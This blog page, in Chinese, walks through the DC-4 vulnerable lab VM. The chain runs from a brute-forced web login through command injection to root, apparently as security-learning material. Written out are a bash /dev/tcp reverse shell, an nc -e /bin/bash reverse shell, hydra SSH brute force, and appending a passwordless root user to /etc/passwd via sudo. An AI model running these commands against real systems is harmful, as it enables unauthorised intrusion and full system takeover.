<!DOCTYPE html>
<html lang="cn">

<head>

<!--浏览器搞笑标题-->
<script type="text/javascript" src="\js\FunnyTitle.js"></script>
<!--动态线条背景-->
<script type="text/javascript"
color="220,220,220" opacity='0.7' zIndex="-2" count="200" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js">
</script>


<meta name="generator" content="Hexo 5.4.0"></head>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="This_is_Y">
    
    <title>
        
            DC-4靶机 |
        
        This_is_Y
    </title>
    <link rel="stylesheet" href="/css/style.css">
    <link rel="shortcut icon" href="/images/title.jpg">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/css/font-awesome.min.css">
    <script id="hexo-configurations">
    let KEEP = window.KEEP || {};
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"cn","path":"search.xml"};
    KEEP.theme_config = {"toc":{"enable":true,"number":true,"expand_all":false,"init_open":false},"style":{"primary_color":"#33CCCC","avatar":"/images/head.png","favicon":"/images/title.jpg","article_img_align":"left","left_side_width":"260px","content_max_width":"920px","hover":{"shadow":true,"scale":true},"first_screen":{"enable":false,"background_img":"/images/Watch.png","description":"Life is but a Dream"},"scroll":{"progress_bar":{"enable":false},"percent":{"enable":false}}},"local_search":{"enable":true,"trigger":"auto","unescape":false,"preload":true},"code_copy":{"enable":true,"style":"default"},"pjax":{"enable":true},"lazyload":{"enable":false},"version":"3.4.1"};
    KEEP.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
  </script>

</head>



<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <span class="pjax-progress-icon">
            <i class="fas fa-circle-notch fa-spin"></i>
        </span>
    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            <header class="header-wrapper">

    <div class="header-content">
        <div class="left">
            <a class="logo-title" href="/">
                This_is_Y
            </a>
        </div>

        <div class="right">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/categories/cnblogs"
                            >
                                CNBLOGS
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/Game"
                            >
                                GAME
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/ReShell"
                            >
                                SHELL
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories/cnblogs">CNBLOGS</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/Game">GAME</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/ReShell">SHELL</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="article-content-container">

        <div class="article-title">
            <span class="title-hover-animation">DC-4靶机</span>
        </div>

        
            <div class="article-header">
                <div class="avatar">
                    <img src="/images/head.png">
                </div>
                <div class="info">
                    <div class="author">
                        <span class="name">This_is_Y</span>
                        
                            <span class="author-label">Lv6</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fas fa-edit"></i>&nbsp;2020-07-22 22:51:00
    </span>
    
        <span class="article-categories article-meta-item">
            <i class="fas fa-folder"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/categories/cnblogs/">cnblogs</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        <div class="article-content markdown-body">
            <p>来自之前cnblog的博客<br><a class="link" target="_blank" rel="noopener" href="https://www.cnblogs.com/This-is-Y/p/13347213.html">源地址：https://www.cnblogs.com/This-is-Y/p/13347213.html<i class="fas fa-external-link-alt"></i></a></p>
<p><a class="link" target="_blank" rel="noopener" href="https://www.five86.com/dc-4.html">下载<i class="fas fa-external-link-alt"></i></a>，安装（vmware直接导入文件），桥接</p>
<p>kali开始nmap扫描</p>
<p>nmap -sP 192.168.123.0/24</p>
<img src="1503868-20200719164434709-620316570.png" alt loading="lazy">

<p>找到目标ip：192.168.123.9</p>
<p>浏览器访问，就一个登陆页面</p>
<img src="1503868-20200719164509154-76924117.png" width="1000" loading="lazy">

<p> </p>
<p> nmap扫描端口；只有22和80</p>
<p>可以确定是linux了（废话）</p>
<img src="1503868-20200722101755939-1486713193.png" alt loading="lazy">

<p> 再dirsearch扫描目录</p>
<img src="1503868-20200719164921773-715340004.png" width="1000" loading="lazy">

<p> 也没有有用的信息</p>
<p>先试试注入，手注和sqlmap都没找出什么来</p>
<p> </p>
<p>burp抓包跑字典暴力破解再试试看</p>
<img src="1503868-20200722083839127-1750061235.png" alt loading="lazy">

<p> 暴力破解出了结果</p>
<p>admin</p>
<p>happy</p>
<p>登陆后的页面，</p>
<img src="1503868-20200722083915861-231379410.png" alt loading="lazy">

<p> </p>
<p> </p>
<p> 只有一个command，点进去，有3个命令供执行</p>
<p>ls -l    显示目录内容列表</p>
<p>du -h      显示每个文件和目录的磁盘使用情况</p>
<p>df -h   显示磁盘相关信息</p>
<img src="1503868-20200722084039243-1322324194.png" alt loading="lazy">

<p> </p>
<p> </p>
<p> 试试抓包，执行命令作为明文参数，修改成别的，发现也可以执行（这里我是换成了dir）</p>
<img src="1503868-20200722084926019-1762086525.png" width="1000" loading="lazy">

<p> </p>
<p> </p>
<p> 验证其可行性后，试试看别的命令，cat command.php</p>
<p>可以看到执行命令的是这个shell_exec()函数</p>
<img src="1503868-20200722085951661-107414924.png" alt loading="lazy">

<p> </p>
<p> </p>
<p> 用户是www-data，权限组在33</p>
<p>没有写文件的权限</p>
<p>直接<a class="link" target="_blank" rel="noopener" href="https://choge.top/2020/02/23/%E5%8F%8D%E5%BC%B9shell%E8%84%9A%E6%9C%AC%E6%94%B6%E9%9B%86/">反弹shell<i class="fas fa-external-link-alt"></i></a></p>
<img src="1503868-20200722092238878-1679955723.png" width="1000" loading="lazy">

<p> </p>
<p> </p>
<p> 看上去像是把命令里的&amp;符当成分隔符了。编码一下就解决了</p>
<p> bash+-i+&gt;%26%2Fdev%2Ftcp%2F192.168.123.42%2F1234+0&gt;%261<br>然鹅还是反弹不出来，看不到报错，也不知道是什么的原因</p>
<p>换nc反弹</p>
<p>nc 192.168.123.41 1234 -e /bin/bash</p>
<p>反弹成功</p>
<img src="1503868-20200722095309079-1344845192.png" alt loading="lazy">

<p>查看是否有可用于suid提权的文件</p>
<p>find / -user root -perm -4000 -print 2&gt;/dev/null</p>
<img src="1503868-20200722101241845-1809258723.png" alt loading="lazy">

<p>没找到</p>
<p>sudo也用不了</p>
<p> uname -a和lsb_release -a查看系统版本</p>
<img src="1503868-20200722101110053-1570558000.png" alt loading="lazy">

<p> </p>
<p> </p>
<p> 去sploitdb里面找是否有可以用的漏洞</p>
<p> 有一些关于ssh的漏洞，但是在反弹回来的shell下，我没有权限wget下载文件</p>
<p> </p>
<p>看了一些别人的博客，到/home目录下，有三个用户</p>
<img src="1503868-20200722103655965-1633930654.png" alt loading="lazy">

<p> </p>
<p> </p>
<p> 但是只有jim下面有文件</p>
<p> backups里面有一个oldpasswd.bak，是一些密码，估计是要爆破</p>
<p>mbox打不开，没有权限</p>
<p>test.sh文件内容像是提示</p>
<img src="1503868-20200722104744291-1768662936.png" alt loading="lazy">

<p> </p>
<p> </p>
<p> 先尝试爆破</p>
<p>把oldpasswords.bak中的数据保存下来（jim.txt)</p>
<p>再使用hydra进行爆破</p>
<p>　hydra -l jim -P jim.txt 192.168.123.9 ssh<br><br>不到半分钟就出来了</p>
<img src="1503868-20200722105446312-1994701178.png" alt loading="lazy">

<p> </p>
<p> </p>
<p> 密码：jibril04<br>通过ssh登陆jim</p>
<p>查看mbox文件内容</p>
<img src="1503868-20200722105625407-610577568.png" alt loading="lazy">

<p> </p>
<p> </p>
<p> 看内容是一封邮件</p>
<p>从jim这边查找文件，再var/mail下看到一封jim的邮件，打开</p>
<img src="1503868-20200722112546396-1552346468.png" alt loading="lazy">

<p> </p>
<p> 得到了用户charles的密码^xHhA&amp;hvim0y<br>试着登陆一下</p>
<img src="1503868-20200722112713063-2099022073.png" alt loading="lazy">

<p> </p>
<p> 成功</p>
<p>跟着这个思路，回到www-data,查看www-data文件，</p>
<img src="1503868-20200722113021374-1393808338.png" alt loading="lazy">

<p> </p>
<p> 有很多封邮件，但是都没用</p>
<p>登陆到charles后，可以使用sudo</p>
<p>用sudo -l看一下，命令teehee不需要密码就可以执行，用</p>
<p>echo “admin::0:0:::/bin/bash” | sudo teehee -a /etc/passwd</p>
<p>在passwd下面添加一个没有密码的root用户，</p>
<p>然后就可以在/root下找到flag了</p>
<img src="1503868-20200722225054047-631918545.png" alt loading="lazy">

<p> </p>
<p> </p>
<p> </p>
<p> </p>

        </div>

        

        
            <div class="article-nav">
                
                    <div class="article-prev">
                        <a class="prev"
                           rel="prev"
                           href="/2020/07/24/%E6%95%B4%E7%90%86win10%20%E5%8F%B3%E9%94%AE%E8%8F%9C%E5%8D%95%E5%8F%8A%E8%B5%84%E6%BA%90%E7%AE%A1%E7%90%86%E5%99%A8%E5%B7%A6%E8%BE%B9%E7%9A%84%E9%83%A8%E5%88%86%E9%80%89%E9%A1%B9/"
                        >
                            <span class="left arrow-icon flex-center">
                              <i class="fas fa-chevron-left"></i>
                            </span>
                            <span class="title flex-center">
                                <span class="post-nav-title-item">整理win10 右键菜单及资源管理器左边的部分选项</span>
                                <span class="post-nav-item">上一篇</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next">
                        <a class="next"
                           rel="next"
                           href="/2020/07/15/DC-3%20%E9%9D%B6%E6%9C%BA/"
                        >
                            <span class="title flex-center">
                                <span class="post-nav-title-item">DC-3 靶机</span>
                                <span class="post-nav-item">下一篇</span>
                            </span>
                            <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        

        
            <div class="comment-container">
                <div class="comments-container">
    <div id="comment-anchor"></div>
    <div class="comment-area-title">
        <i class="fas fa-comments">&nbsp;评论</i>
    </div>
    

        
            
    <div class="valine-container">
        <script data-pjax
                src="//cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js"></script>
        <div id="vcomments"></div>
        <script data-pjax>
            function loadValine() {
                new Valine({
                    el: '#vcomments',
                    appId: 'pnLUL03RCIjbXBNX6m4sBrtq-gzGzoHsz',
                    appKey: 'itjAi31G55tfhpSKJiuLDe2g',
                    meta: ['nick', 'mail', 'link'],
                    avatar: 'wavatar',
                    enableQQ: true,
                    placeholder: '生命是上天的馈赠，我不想虚度年华',
                    lang: 'cn'.toLowerCase()
                });

                function getAuthor(language) {
                    switch (language) {
                        case 'en':
                            return 'Author';
                        case 'zh-CN':
                            return '博主';
                        default:
                            return 'Master';
                    }
                }

                // Add "Author" identify
                const getValineDomTimer = setInterval(() => {
                    const vcards = document.querySelectorAll('#vcomments .vcards .vcard');
                    if (vcards.length > 0) {
                        let author = 'This_is_Y';

                        if (author) {
                            for (let vcard of vcards) {
                                const vnick_dom = vcard.querySelector('.vhead .vnick');
                                const vnick = vnick_dom.innerHTML;
                                if (vnick === author) {
                                    vnick_dom.innerHTML = `${vnick} <span class="author">${getAuthor(KEEP.hexo_config.language)}</span>`
                                }
                            }
                        }
                        clearInterval(getValineDomTimer);
                    } else {
                        clearInterval(getValineDomTimer);
                    }
                }, 2000);
            }

            if ('true') {
                const loadValineTimeout = setTimeout(() => {
                    loadValine();
                    clearTimeout(loadValineTimeout);
                }, 1000);
            } else {
                window.addEventListener('DOMContentLoaded', loadValine);
            }
        </script>
    </div>



        
    
</div>

            </div>
        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
            2023&nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;<a href="/">This_is_Y</a>
        </div>
        
            <script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                    <span id="busuanzi_container_site_uv">
                        访问人数&nbsp;<span id="busuanzi_value_site_uv"></span>&ensp;
                    </span>
                
                
                    <span id="busuanzi_container_site_pv">
                        总访问量&nbsp;<span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="theme-info info-item">
            由 <a target="_blank" href="https://hexo.io">Hexo</a> 驱动&nbsp;|&nbsp;主题&nbsp;<a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3.4.1</a>
        </div>
        
    </div>
</footer>

        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item page-aside-toggle">
                <i class="fas fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
            <li class="go-comment">
                <i class="fas fa-comment"></i>
            </li>
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-expand-width flex-center">
            <i class="fas fa-arrows-alt-h"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="fas fa-arrow-up"></i>
            </li>
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>
        
    </ul>
</div>

    </div>

    
        <aside class="page-aside">
            <div class="post-toc-wrap">
    <div class="post-toc">
        
    </div>
</div>
        </aside>
    

    <div class="image-viewer-container">
    <img src="">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="popup-btn-close">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

</main>



<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/dark-light-toggle.js"></script>


    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/local-search.js"></script>



    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/code-copy.js"></script>




<div class="post-scripts pjax">
    
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/left-side-toggle.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/libs/anime.min.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/toc.js"></script>
    
</div>


    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/libs/pjax.min.js"></script>
<script>
    window.addEventListener('DOMContentLoaded', () => {
        const pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            KEEP.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            KEEP.utils.pjaxProgressBarEnd();
            pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            KEEP.refresh();
        });
    });
</script>



</body>
</html>
